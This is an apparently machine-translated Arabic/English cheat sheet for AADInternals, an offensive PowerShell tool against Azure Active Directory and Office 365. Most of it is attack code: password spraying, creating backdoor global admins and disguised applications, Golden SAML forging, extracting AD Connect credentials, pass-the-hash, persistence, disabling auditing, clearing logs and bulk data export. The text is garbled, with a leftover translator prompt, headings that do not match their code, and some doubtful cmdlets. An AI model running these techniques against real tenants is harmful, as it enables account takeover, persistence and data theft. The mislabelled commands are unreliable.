أداة AADInternals للاستغلال في Azure Active Directory - ورقة الغش
نظرة عامة
AADInternals هي وحدة PowerShell طورها الدكتور نيستوري سيينيماا لإدارة واستغلال Azure Active Directory و Office 365. توفر قدرات شاملة للتعرف على Azure AD والاستغلال والأنشطة بعد الاستغلال.
⚠️ تحذير: هذه الأداة مخصصة للاختبار الاختراقي المصرح به وتقييمات الأمن فقط. تأكد من وجود التفويض المناسب قبل الاستخدام في أي بيئة.
Would you like me to continue with the rest of the sections? I can translate them in batches or all at once. Please advise.```powershell
Install from PowerShell Gallery
Install-Module AADInternals
Install specific version
Install-Module AADInternals -RequiredVersion 0.9.3
Install for current user only
Install-Module AADInternals -Scope CurrentUser
Update existing installation
Update-Module AADInternals
### Manual Installation
```powershell
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/Gerenios/AADInternals/archive/master.zip" -OutFile "AADInternals.zip"
Expand-Archive -Path "AADInternals.zip" -DestinationPath "C:\Tools\"
# Import module
Import-Module C:\Tools\AADInternals-master\AADInternals.psd1
# Install dependencies
Install-Module -Name MSAL.PS
Install-Module -Name Microsoft.GraphDocker Installation
# Run AADInternals in Docker with PowerShell
docker run -it mcr.microsoft.com/powershell:latest
pwsh -c "Install-Module AADInternals -Force; Import-Module AADInternals"Basic Usage
Module Import and Setup
# Import AADInternals module
Import-Module AADInternals
# Get module information
Get-Module AADInternals
# List available commands
Get-Command -Module AADInternals
# Get help for specific command
Get-Help Get-AADIntAccessTokenForAADGraph -FullAuthentication Methods
# Interactive authentication
$cred = Get-Credential
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred
# Device code authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode
# Certificate authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $clientId -TenantId $tenantId
# Refresh token authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshTokenCommand Reference
Authentication Commands
| أمر | وصف |
|---|---|
Get-AADIntAccessTokenForAADGraph | احصل على رمز الوصول لـ AAD Graph |
Get-AADIntAccessTokenForMSGraph | احصل على رمز الوصول لـ MS Graph |
Get-AADIntAccessTokenForEXO | احصل على رمز الوصول لـ Exchange Online |
Get-AADIntAccessTokenForSPO | احصل على رمز الوصول لـ SharePoint Online |
Get-AADIntAccessTokenForTeams | احصل على رمز الوصول لـ Teams |
Reconnaissance Commands
| أمر | وصف |
|---|---|
Get-AADIntTenantID | احصل على معرف المستأجر من النطاق |
Get-AADIntTenantDomains | احصل على نطاقات المستأجر |
Get-AADIntCompanyInformation | احصل على معلومات الشركة |
Get-AADIntUsers | احصل على مستخدمي Azure AD |
Get-AADIntGroups | احصل على مجموعات Azure AD |
Get-AADIntApplications | احصل على التطبيقات |
Exploitation Commands
| أمر | وصف |
|---|---|
New-AADIntBackdoor | إنشاء مستخدم backdoor |
Set-AADIntUserPassword | تعيين كلمة مرور المستخدم |
Add-AADIntUserToGroup | أضف المستخدم إلى المجموعة |
Grant-AADIntAppRoleToServicePrincipal | منح أذونات التطبيق |
New-AADIntGlobalAdmin | إنشاء مسؤول عام |
Reconnaissance and Information Gathering
Tenant Discovery
# Get tenant ID from domain
$tenantId = Get-AADIntTenantID -Domain "company.com"
# Get tenant domains
$domains = Get-AADIntTenantDomains -Domain "company.com"
# Get company information
$companyInfo = Get-AADIntCompanyInformation -AccessToken $accessToken
# Get tenant details
$tenantDetails = Get-AADIntTenantDetails -AccessToken $accessTokenUser Enumeration
# Get all users
$users = Get-AADIntUsers -AccessToken $accessToken
# Get specific user
$user = Get-AADIntUser -AccessToken $accessToken -UserPrincipalName "user@company.com"
# Get user's group memberships
$groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName "user@company.com"
# Get user's roles
$roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName "user@company.com"
# Search users by attribute
$users = Get-AADIntUsers -AccessToken $accessToken -SearchString "admin"Group Enumeration
# Get all groups
$groups = Get-AADIntGroups -AccessToken $accessToken
# Get group members
$members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $groupId
# Get privileged groups
$adminGroups = Get-AADIntGroups -AccessToken $accessToken|Where-Object \\\\{$_.displayName -like "*admin*"\\\\}
# Get group owners
$owners = Get-AADIntGroupOwners -AccessToken $accessToken -GroupId $groupIdApplication and Service Principal Enumeration
# Get all applications
$apps = Get-AADIntApplications -AccessToken $accessToken
# Get service principals
$servicePrincipals = Get-AADIntServicePrincipals -AccessToken $accessToken
# Get application permissions
$permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $appId
# Get OAuth permissions
$oauthPerms = Get-AADIntOAuthPermissions -AccessToken $accessTokenExploitation Techniques
Password Attacks
# Password spray attack
$users = Get-AADIntUsers -AccessToken $accessToken
$passwords = @("Password123", "Summer2024", "Company123")
foreach ($password in $passwords) \\\\{
foreach ($user in $users) \\\\{
try \\\\{
$token = Get-AADIntAccessTokenForAADGraph -UserPrincipalName $user.userPrincipalName -Password $password
Write-Host "Success: $($user.userPrincipalName):$password"
\\\\}
catch \\\\{
# Password failed
\\\\}
\\\\}
\\\\}
# Set user password (requires privileges)
Set-AADIntUserPassword -AccessToken $accessToken -UserPrincipalName "user@company.com" -Password "NewPassword123"Privilege Escalation
# Create global administrator
New-AADIntGlobalAdmin -AccessToken $accessToken -UserPrincipalName "backdoor@company.com" -Password "BackdoorPass123"
# Add user to privileged group
Add-AADIntUserToGroup -AccessToken $accessToken -UserPrincipalName "user@company.com" -GroupId $adminGroupId
# Grant application permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $spId -AppRoleId $roleId -ResourceId $resourceId
# Create application with high privileges
$app = New-AADIntApplication -AccessToken $accessToken -DisplayName "BackdoorApp" -RequiredResourceAccess $permissionsBackdoor Creation
# Create backdoor user
$backdoorUser = New-AADIntBackdoor -AccessToken $accessToken -UserPrincipalName "service-account@company.com" -Password "ComplexPassword123"
# Create backdoor application
$backdoorApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "LegitimateApp" -RequiredResourceAccess $highPrivileges
# Create service principal for backdoor
$backdoorSP = New-AADIntServicePrincipal -AccessToken $accessToken -ApplicationId $backdoorApp.appId
# Grant backdoor permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $backdoorSP.id -AppRoleId $adminRoleIdToken Manipulation
# Get access token for different resources
$graphToken = Get-AADIntAccessTokenForMSGraph -AccessToken $accessToken
$exoToken = Get-AADIntAccessTokenForEXO -AccessToken $accessToken
$spoToken = Get-AADIntAccessTokenForSPO -AccessToken $accessToken
# Parse JWT token
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken
# Get refresh token
$refreshToken = Get-AADIntRefreshToken -AccessToken $accessToken
# Use refresh token for persistence
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshTokenAdvanced Attacks
Golden SAML Attack
# Export ADFS certificate (requires ADFS access)
$cert = Export-AADIntADFSCertificate
# Create Golden SAML token
$samlToken = New-AADIntSAMLToken -Certificate $cert -UserPrincipalName "admin@company.com" -Issuer "http://company.com/adfs/services/trust"
# Use Golden SAML to get access token
$accessToken = Get-AADIntAccessTokenForAADGraph -SAMLToken $samlTokenAzure AD Connect Attacks
# Get Azure AD Connect information
$adConnectInfo = Get-AADIntAzureADConnectInfo -AccessToken $accessToken
# Extract Azure AD Connect credentials (requires local admin on AAD Connect server)
$adConnectCreds = Get-AADIntAzureADConnectCredentials
# Use extracted credentials
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $adConnectCredsPass-the-Hash Attacks
# Use NTLM hash for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "user@company.com" -Hash $ntlmHash
# Use Kerberos ticket
$accessToken = Get-AADIntAccessTokenForAADGraph -KerberosTicket $ticket
```### هجمات تسجيل الأجهزة
```powershell
# Register malicious device
$device = New-AADIntDevice -AccessToken $accessToken -DisplayName "DESKTOP-MALICIOUS" -DeviceId $deviceId
# Get device certificate
$deviceCert = Get-AADIntDeviceCertificate -AccessToken $accessToken -DeviceId $deviceId
# Use device certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $deviceCert
```## تقنيات الاستمرارية
```powershell
# Create persistent application
$persistentApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Graph PowerShell" -RequiredResourceAccess $permissions
# Add application secret
$secret = New-AADIntApplicationSecret -AccessToken $accessToken -ApplicationId $persistentApp.appId
# Use application for persistence
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId $persistentApp.appId -ClientSecret $secret.value -TenantId $tenantId
```### الاستمرارية القائمة على التطبيق
```powershell
# Create service account
$serviceAccount = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -DisplayName "Backup Service Account" -Password "ServicePass123"
# Assign privileged roles
Add-AADIntUserToRole -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -RoleName "Global Administrator"
# Disable account auditing
Set-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -AuditingEnabled $false
```### الاستمرارية القائمة على المستخدم
```powershell
# Generate certificate for authentication
$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable
# Add certificate to application
Add-AADIntApplicationCertificate -AccessToken $accessToken -ApplicationId $appId -Certificate $cert
# Use certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $appId -TenantId $tenantId
```### الاستمرارية القائمة على الشهادات
```powershell
# Export all users with detailed information
$users = Get-AADIntUsers -AccessToken $accessToken
$users|Export-Csv -Path "users.csv" -NoTypeInformation
# Export user photos
foreach ($user in $users) \\\\{
$photo = Get-AADIntUserPhoto -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
if ($photo) \\\\{
[System.IO.File]::WriteAllBytes("photos\$($user.userPrincipalName).jpg", $photo)
\\\\}
\\\\}
# Export user's OneDrive files
$files = Get-AADIntUserOneDriveFiles -AccessToken $accessToken -UserPrincipalName "user@company.com"
```## تسريب البيانات
```powershell
# Export group memberships
$groups = Get-AADIntGroups -AccessToken $accessToken
foreach ($group in $groups) \\\\{
$members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $group.id
$group|Add-Member -NotePropertyName "Members" -NotePropertyValue $members
\\\\}
$groups|ConvertTo-Json -Depth 3|Out-File "groups.json"
# Export role assignments
$roles = Get-AADIntDirectoryRoles -AccessToken $accessToken
foreach ($role in $roles) \\\\{
$members = Get-AADIntDirectoryRoleMembers -AccessToken $accessToken -RoleId $role.id
$role|Add-Member -NotePropertyName "Members" -NotePropertyValue $members
\\\\}
$roles|ConvertTo-Json -Depth 3|Out-File "roles.json"
```### استخراج بيانات المستخدم
```powershell
# Export applications with permissions
$apps = Get-AADIntApplications -AccessToken $accessToken
foreach ($app in $apps) \\\\{
$permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $app.id
$app|Add-Member -NotePropertyName "Permissions" -NotePropertyValue $permissions
\\\\}
$apps|ConvertTo-Json -Depth 3|Out-File "applications.json"
# Export OAuth consent grants
$consents = Get-AADIntOAuthPermissions -AccessToken $accessToken
$consents|Export-Csv -Path "oauth_consents.csv" -NoTypeInformation
```### معلومات المجموعات والأدوار
```powershell
# Use legitimate application names
$stealthApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Office 365" -RequiredResourceAccess $permissions
# Mimic legitimate service accounts
$stealthUser = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "o365sync@company.com" -DisplayName "Office 365 Sync Service"
# Use existing application IDs
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId "1b730954-1685-4b74-9bfd-dac224a7b894" -ClientSecret $secret # Graph Explorer
```### بيانات التطبيق والأذونات
```powershell
# Implement delays between requests
function Invoke-AADIntWithDelay \\\\{
param($Command, $Delay = 1)
& $Command
Start-Sleep -Seconds $Delay
\\\\}
# Randomize request timing
$users = Get-AADIntUsers -AccessToken $accessToken
foreach ($user in $users) \\\\{
$delay = Get-Random -Minimum 1 -Maximum 5
Start-Sleep -Seconds $delay
$groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
\\\\}
```## تقنيات التحايل
```powershell
# Use service principal instead of user account
$servicePrincipalToken = Get-AADIntAccessTokenForAADGraph -ClientId $clientId -ClientSecret $clientSecret -TenantId $tenantId
# Perform actions during business hours
$currentHour = (Get-Date).Hour
if ($currentHour -ge 9 -and $currentHour -le 17) \\\\{
# Perform stealthy operations
\\\\}
# Use legitimate IP ranges
# Ensure operations are performed from expected geographic locations
```### العمليات المتخفية
```powershell
# Check for monitoring
$auditLogs = Get-AADIntAuditLogs -AccessToken $accessToken -Filter "activityDisplayName eq 'Add application'"
# Verify current permissions
$currentPerms = Get-AADIntCurrentUserPermissions -AccessToken $accessToken
# Check for Conditional Access policies
$caPolicies = Get-AADIntConditionalAccessPolicies -AccessToken $accessToken
# Monitor for security alerts
$securityAlerts = Get-AADIntSecurityAlerts -AccessToken $accessToken
```### تحديد المعدل والتباطؤ
```powershell
# Remove created applications
Remove-AADIntApplication -AccessToken $accessToken -ApplicationId $backdoorApp.appId
# Remove created users
Remove-AADIntUser -AccessToken $accessToken -UserPrincipalName "backdoor@company.com"
# Remove role assignments
Remove-AADIntUserFromRole -AccessToken $accessToken -UserPrincipalName "user@company.com" -RoleName "Global Administrator"
# Clear audit logs (if possible)
Clear-AADIntAuditLogs -AccessToken $accessToken -LogType "SignInLogs"
```### التحايل على السجلات
```powershell
# Debug authentication
$DebugPreference = "Continue"
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred
# Check token validity
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken
$tokenInfo.exp # Check expiration
# Refresh expired token
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken
```## التحايل الدفاعي
```powershell
# Check current permissions
$permissions = Get-AADIntCurrentUserPermissions -AccessToken $accessToken
# Test specific permission
Test-AADIntPermission -AccessToken $accessToken -Permission "User.Read.All"
# Get required permissions for command
Get-AADIntRequiredPermissions -Command "Get-AADIntUsers"
```### إجراءات مكافحة الكشف
```powershell
# Handle rate limiting
try \\\\{
$users = Get-AADIntUsers -AccessToken $accessToken
\\\\}
catch \\\\{
if ($_.Exception.Message -like "*throttled*") \\\\{
Start-Sleep -Seconds 60
$users = Get-AADIntUsers -AccessToken $accessToken
\\\\}
\\\\}
# Use pagination for large datasets
$users = @()
$skip = 0
do \\\\{
$batch = Get-AADIntUsers -AccessToken $accessToken -Top 100 -Skip $skip
$users += $batch
$skip += 100
\\\\} while ($batch.Count -eq 100)
```### عمليات التنظيف
```powershell
# Export data for BloodHound
$users = Get-AADIntUsers -AccessToken $accessToken
$groups = Get-AADIntGroups -AccessToken $accessToken
# Convert to BloodHound format
$bloodhoundData = @\\\\{
users = $users|ForEach-Object \\\\{
@\\\\{
ObjectIdentifier = $_.id
Properties = @\\\\{
name = $_.userPrincipalName
displayname = $_.displayName
enabled = $_.accountEnabled
\\\\}
\\\\}
\\\\}
\\\\}
$bloodhoundData|ConvertTo-Json -Depth 3|Out-File "bloodhound_data.json"
```## استكشاف الأخطاء وإصلاحها
```powershell
# Use AADInternals in Empire agent
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode
$users = Get-AADIntUsers -AccessToken $accessToken
$users|ConvertTo-Json|Out-File "C:\temp\aad_users.json"
```### مشاكل المصادقة
https://github.com/Gerenios/AADInternals##
# مشاكل الأذونات
https://aadinternals.com/##
# قيود واجهة برمجة التطبيقات
https://aadinternals.com/aadinternals/[بحث أمن Azure AD]https://www.blackhat.com/us-19/briefings/schedule/#going-rogue-azure-ad-13857[أمن Office 365]https://docs.microsoft.com/en-us/microsoft-365/security/
*يوفر هذا الدليل المختصر مرجعًا شاملًا لاستخدام AADInternals. تأكد دائمًا من حصولك على التصريح المناسب قبل إجراء تقييمات أمن Azure AD.*